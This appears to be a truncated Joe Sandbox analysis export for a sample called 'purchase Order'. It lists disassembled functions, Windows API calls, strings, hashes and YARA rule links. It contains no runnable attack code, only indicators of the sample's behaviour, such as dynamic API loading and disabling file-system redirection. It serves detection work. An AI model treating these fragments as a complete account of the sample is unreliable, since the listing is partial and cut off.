Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: a5b3d231fb1ba1c0e1dab0985aeb04f82812b0734adc7a00479d935824738f45
Instruction ID: 461404f5a71b03cd767504abe125110772d8684b781573581012dd6a5698f629
Opcode Fuzzy Hash: a5b3d231fb1ba1c0e1dab0985aeb04f82812b0734adc7a00479d935824738f45
Instruction Fuzzy Hash: BC216A75600510EFDB10EF65D885E2AB7E9FB0A710B018551F94ADB6B0CB30FC51DBA4

Function 00CAA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CAA46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CAA482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CAA48F

Strings

msctls_trackbar32, xrefs: 00CAA444

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: dffd37d4d45351dcda6c3002cf0e537a6c8c217ae2823fa3db38fa85c99cacb0
Instruction ID: 0e19f9ff26936e474c386cf872303c97ba11564dc750da0a88d20fbc0e885d1f
Opcode Fuzzy Hash: dffd37d4d45351dcda6c3002cf0e537a6c8c217ae2823fa3db38fa85c99cacb0
Instruction Fuzzy Hash: 8E11CA71240309BEEF245F75CC45FAB3B69EF89758F014128FA55A6091D7B2E811D724

Function 00CA9617 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00CA9699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CA96A8

Strings

@U=u, xrefs: 00CA96A8
edit, xrefs: 00CA967D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: @U=u$edit
API String ID: 2978978980-590756393
Opcode ID: 7f0d043d8e6ff0e15826d87903dfff500f29d5a9cca8d8806c2b6efc3d7b8cf8
Instruction ID: e4cfe889a68255c97d72a4d822de4c571b159de0c96871be599c0eb840daa40d
Opcode Fuzzy Hash: 7f0d043d8e6ff0e15826d87903dfff500f29d5a9cca8d8806c2b6efc3d7b8cf8
Instruction Fuzzy Hash: 10116A7150020AAAEB509FA4DC46FEB3B6AEF0637CF504724F975971E0C7359C50A760

Function 00C7B781 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C7B7EF

Strings

@U=u, xrefs: 00C7B7EF
ComboBox, xrefs: 00C7B78B
ListBox, xrefs: 00C7B7B9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$ComboBox$ListBox
API String ID: 3850602802-2258501812
Opcode ID: 2e394ddf0db060091b9c2be392972f1037ff7da7b402059bb9f81b16cac0f937
Instruction ID: 202618fe36d42494119a4911eb65a4bc47b839db605ffc81ba5ea4d96af2fe50
Opcode Fuzzy Hash: 2e394ddf0db060091b9c2be392972f1037ff7da7b402059bb9f81b16cac0f937
Instruction Fuzzy Hash: 7401D471641118ABCB84EBA4CC92EFE3379BF45350B04461DF576672E2EF705D08A7A0

Function 00C7B67D Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C7B6EB

Strings

@U=u, xrefs: 00C7B6EB
ComboBox, xrefs: 00C7B687
ListBox, xrefs: 00C7B6B5

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$ComboBox$ListBox
API String ID: 3850602802-2258501812
Opcode ID: e827d79ab374c3078eb4d2a5f249c93576c7be669a7d94e1931f926b90900fdf
Instruction ID: 93019303111b5a5693a8acb0df9e14ec048ac05ea92d93bc7d4620acfc3f326d
Opcode Fuzzy Hash: e827d79ab374c3078eb4d2a5f249c93576c7be669a7d94e1931f926b90900fdf
Instruction Fuzzy Hash: D80162B1642108AFCB48EBA4C952FFF73B8AF05344F104029B656B31A1DF545F18A7B5

Function 00C7B700 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C7B76C

Strings

@U=u, xrefs: 00C7B76C
ComboBox, xrefs: 00C7B70A
ListBox, xrefs: 00C7B738

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$ComboBox$ListBox
API String ID: 3850602802-2258501812
Opcode ID: c80560cab289a2ab51a7539222aead7970923faaaa5c4e48bfb2a040bcc7fa6a
Instruction ID: d401786eecc3012448b51439d1d619aabc56f149c93fcba6dbe080858ecc4267
Opcode Fuzzy Hash: c80560cab289a2ab51a7539222aead7970923faaaa5c4e48bfb2a040bcc7fa6a
Instruction Fuzzy Hash: 2801D1B1642108ABCB44EBA4C943FFE73ACAF05344F104029B946B31A2DB605F09A7B5

Function 00CAD974 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00D01628,00CB04C9,000000FC,?,00000000,00000000,?,?,?,00CBE47E,?,?,?,?,?), ref: 00CAD976
GetFocus.USER32 ref: 00CAD97E

Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F

Part of subcall function 00C5B526: GetWindowLongW.USER32(?,000000EB), ref: 00C5B537

SendMessageW.USER32(015E7710,000000B0,000001BC,000001C0), ref: 00CAD9F0

Strings

@U=u, xrefs: 00CAD9F0

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: @U=u
API String ID: 3601265619-2594219639
Opcode ID: c0262c3d742553083c94cc11e29a68845f4b63f7fc5f926b71d231b9cecd5681
Instruction ID: 488c1034cff1194e49d4c1daf4853037a4615ec861417e216f26412080dd0849
Opcode Fuzzy Hash: c0262c3d742553083c94cc11e29a68845f4b63f7fc5f926b71d231b9cecd5681
Instruction Fuzzy Hash: AB0144352006018BC7149B38DC84B6A77AABB8A314F58076DE86BC73A5DB319D46CB51

Function 00C41000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4103B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C41052

SendMessageW.USER32(?,0000000C,00000000,?), ref: 00C4101C
GetParent.USER32 ref: 00CB2026
InvalidateRect.USER32(00000000,?,00000000,00000001,?,0000000C,00000000,?), ref: 00CB202D

Strings

@U=u, xrefs: 00C4101C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$InvalidateParentRectTimeout
String ID: @U=u
API String ID: 3648793173-2594219639
Opcode ID: eb4de2609fd50b907992d9ee873e3e10f810cb30bf9d0fdb2a8e2e602312ae1f
Instruction ID: d46b68fbdaba90d22e7b010b4d4260f4238c8d92687f710fc5c7366e14ec19a2
Opcode Fuzzy Hash: eb4de2609fd50b907992d9ee873e3e10f810cb30bf9d0fdb2a8e2e602312ae1f
Instruction Fuzzy Hash: 22F0A9301002C8FBEF202F60EC49F9A7BA8BB12380F144425F9C19B0A0C6B398C1EB60

Function 00C62287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C62350,?), ref: 00C622A1
GetProcAddress.KERNEL32(00000000), ref: 00C622A8

Strings

RoInitialize, xrefs: 00C62290
combase.dll, xrefs: 00C6229C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 502ceb06dea6d6313f7a3a5422c9254e093a7e422252e3c9534224a23cfcb8a2
Instruction ID: f131501f6e312374cd381e5756ed4f64e9870ee29194a818d5c0fd0c27812a17
Opcode Fuzzy Hash: 502ceb06dea6d6313f7a3a5422c9254e093a7e422252e3c9534224a23cfcb8a2
Instruction Fuzzy Hash: 59E09A70694701ABDB609F71EC89F693A69B700716F108034F11BE51A0DFB54455DF66

Function 00C6235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C62276), ref: 00C62376
GetProcAddress.KERNEL32(00000000), ref: 00C6237D

Strings

RoUninitialize, xrefs: 00C62365
combase.dll, xrefs: 00C62371

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: db153823f0e9a532c1a84a985c535c626e289a7391b1412e07f0c2de69c8e215
Instruction ID: 93ec0b48a29012b002c0abe5d827b90adc5576a7f051dea65de2e58d970afefa
Opcode Fuzzy Hash: db153823f0e9a532c1a84a985c535c626e289a7391b1412e07f0c2de69c8e215
Instruction Fuzzy Hash: BDE0B6B0544300AFDB205F61ED0DF183A68B704702F104438F20ED22B4CBB99500DA26

Function 00CBAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00CBAC60
__swprintf.LIBCMT ref: 00CBAC94

Strings

%.3d, xrefs: 00CBAC6E
WIN_XPe, xrefs: 00CBACD3

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 28d9f61e1eb711909354d4c8a1afb993dda8d1b47e52b4301031c266cf7b0dd0
Instruction ID: 3c0938ce2ddea725ed023461cb088551bcc2380ef2544226d9e6705d433d6b1e
Opcode Fuzzy Hash: 28d9f61e1eb711909354d4c8a1afb993dda8d1b47e52b4301031c266cf7b0dd0
Instruction Fuzzy Hash: 4AE012B180462CEBCB549791CD45DFA777CA704742F5400E2F987E1000E6369BC4AA23

Function 00C442F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00C442EC,?,00C442AA,?), ref: 00C44304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C44316

Strings

kernel32.dll, xrefs: 00C442FF
Wow64RevertWow64FsRedirection, xrefs: 00C44310

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: c92d98b26a843ad6a4564f713d2c733cdf52a4f0d0c315eed99d50548ab00279
Instruction ID: bcebd636bd0623aa029d3c62957940b43dfe4d33c07993b9136b5bdac22ba1f2
Opcode Fuzzy Hash: c92d98b26a843ad6a4564f713d2c733cdf52a4f0d0c315eed99d50548ab00279
Instruction Fuzzy Hash: BFD0A770800712EFC7244F20EC0CB5976D4BB04721B244439F552D2170D7B0C9808610

Function 00CA2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00CA21FB,?,00CA23EF), ref: 00CA2213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00CA2225

Strings

GetProcessId, xrefs: 00CA221F
kernel32.dll, xrefs: 00CA220E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 6a64d09941bdddea2ad8e3c127ae45ef5eeee342456f9051d2e9af7797ec7e5c
Instruction ID: 670b682806d1b64b7aed3ab24141e0bc8ef2457363061ba8cb44694257fba7d5
Opcode Fuzzy Hash: 6a64d09941bdddea2ad8e3c127ae45ef5eeee342456f9051d2e9af7797ec7e5c
Instruction Fuzzy Hash: 8CD0A7348007279FD7215F34FC08B5A76D8EB05325B154439E852E2150D770D8C08750

Function 00C4434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00C441BB,00C44341,?,00C4422F,?,00C441BB,?,?,?,?,00C439FE,?,00000001), ref: 00C44359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C4436B

Strings

kernel32.dll, xrefs: 00C44354
Wow64DisableWow64FsRedirection, xrefs: 00C44365

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 4b39e75aece6484001a67c639c4f8169c8a6734c8b3907d20e3674704dfdfbe8
Instruction ID: 304c90914b7adc2e6df0f7ec894ff8a9382b59d41964f10ee3539d3fcea13272
Opcode Fuzzy Hash: 4b39e75aece6484001a67c639c4f8169c8a6734c8b3907d20e3674704dfdfbe8
Instruction Fuzzy Hash: A0D0A730C00712AFC7244F30EC09B5976D4BB10B25B24C439E492D2160D7B0D9808610

Function 00C80564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00C8052F,?,00C806D7), ref: 00C80572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00C80584

Strings

UnRegisterTypeLibForUser, xrefs: 00C8057E
oleaut32.dll, xrefs: 00C8056D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: ff565da4d52349b04838a9cbcfa19ec9ea4998c020a7d9d633f483aaccd07934
Instruction ID: e66bd1ddd6d7f2d013a8e93dd96be5038aa4dfe683dc03ec2bcb875326b0eee0
Opcode Fuzzy Hash: ff565da4d52349b04838a9cbcfa19ec9ea4998c020a7d9d633f483aaccd07934
Instruction Fuzzy Hash: 14D05E304103329EC7606FA0E808B5A77E4AB04314F248439E99292554D670C5C48B24

Function 00C80539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,00C8051D,?,00C805FE), ref: 00C80547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00C80559

Strings

oleaut32.dll, xrefs: 00C80542
RegisterTypeLibForUser, xrefs: 00C80553

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: bdd7831cf293cd03a69a6df9a28d6d420c95e61cac296791b527add3ed91f8a4
Instruction ID: 16af77efc29dcd2a168a39966c57c8691d920d3ff04dcf77f5191da9cde913a2
Opcode Fuzzy Hash: bdd7831cf293cd03a69a6df9a28d6d420c95e61cac296791b527add3ed91f8a4
Instruction Fuzzy Hash: 36D0A7304107229FC7609F60EC08B5977E4AB00315F24C43DE467D2150D670CD848B24

Function 00C9ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C9ECBE,?,00C9EBBB), ref: 00C9ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C9ECE8

Strings

GetSystemWow64DirectoryW, xrefs: 00C9ECE2
kernel32.dll, xrefs: 00C9ECD1

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 358c8f16d4b8981e5aa882eb61ba06a3c9be396310c713603de7f35b4b441b6e
Instruction ID: f517c70e5c402d49637f1e1f45521ee452c27beffb65a00c77167cc00920d66c
Opcode Fuzzy Hash: 358c8f16d4b8981e5aa882eb61ba06a3c9be396310c713603de7f35b4b441b6e
Instruction Fuzzy Hash: A4D0A7308007239FCF209F60EC4CB5A7AE4AB10311B148839F896D2150DB70C8808610

Function 00C9BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00C9BAD3,00000001,00C9B6EE,?,00CDDC00), ref: 00C9BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C9BAFD

Strings

GetModuleHandleExW, xrefs: 00C9BAF7
kernel32.dll, xrefs: 00C9BAE6

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 9f42024cc36f39710d356523a4f31ba6c8476ceb28bff76e51bddb91d2f8a7b8
Instruction ID: 4a08474c8005c576046a920f60f57a901ffb17200a19021929187042a7757318
Opcode Fuzzy Hash: 9f42024cc36f39710d356523a4f31ba6c8476ceb28bff76e51bddb91d2f8a7b8
Instruction Fuzzy Hash: 0FD0A730C00712EFCB305F20FC4CF6A76D4AB00311B144439E953D2194DB70CC80C615

Function 00CA3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00CA3BD1,?,00CA3E06), ref: 00CA3BE9
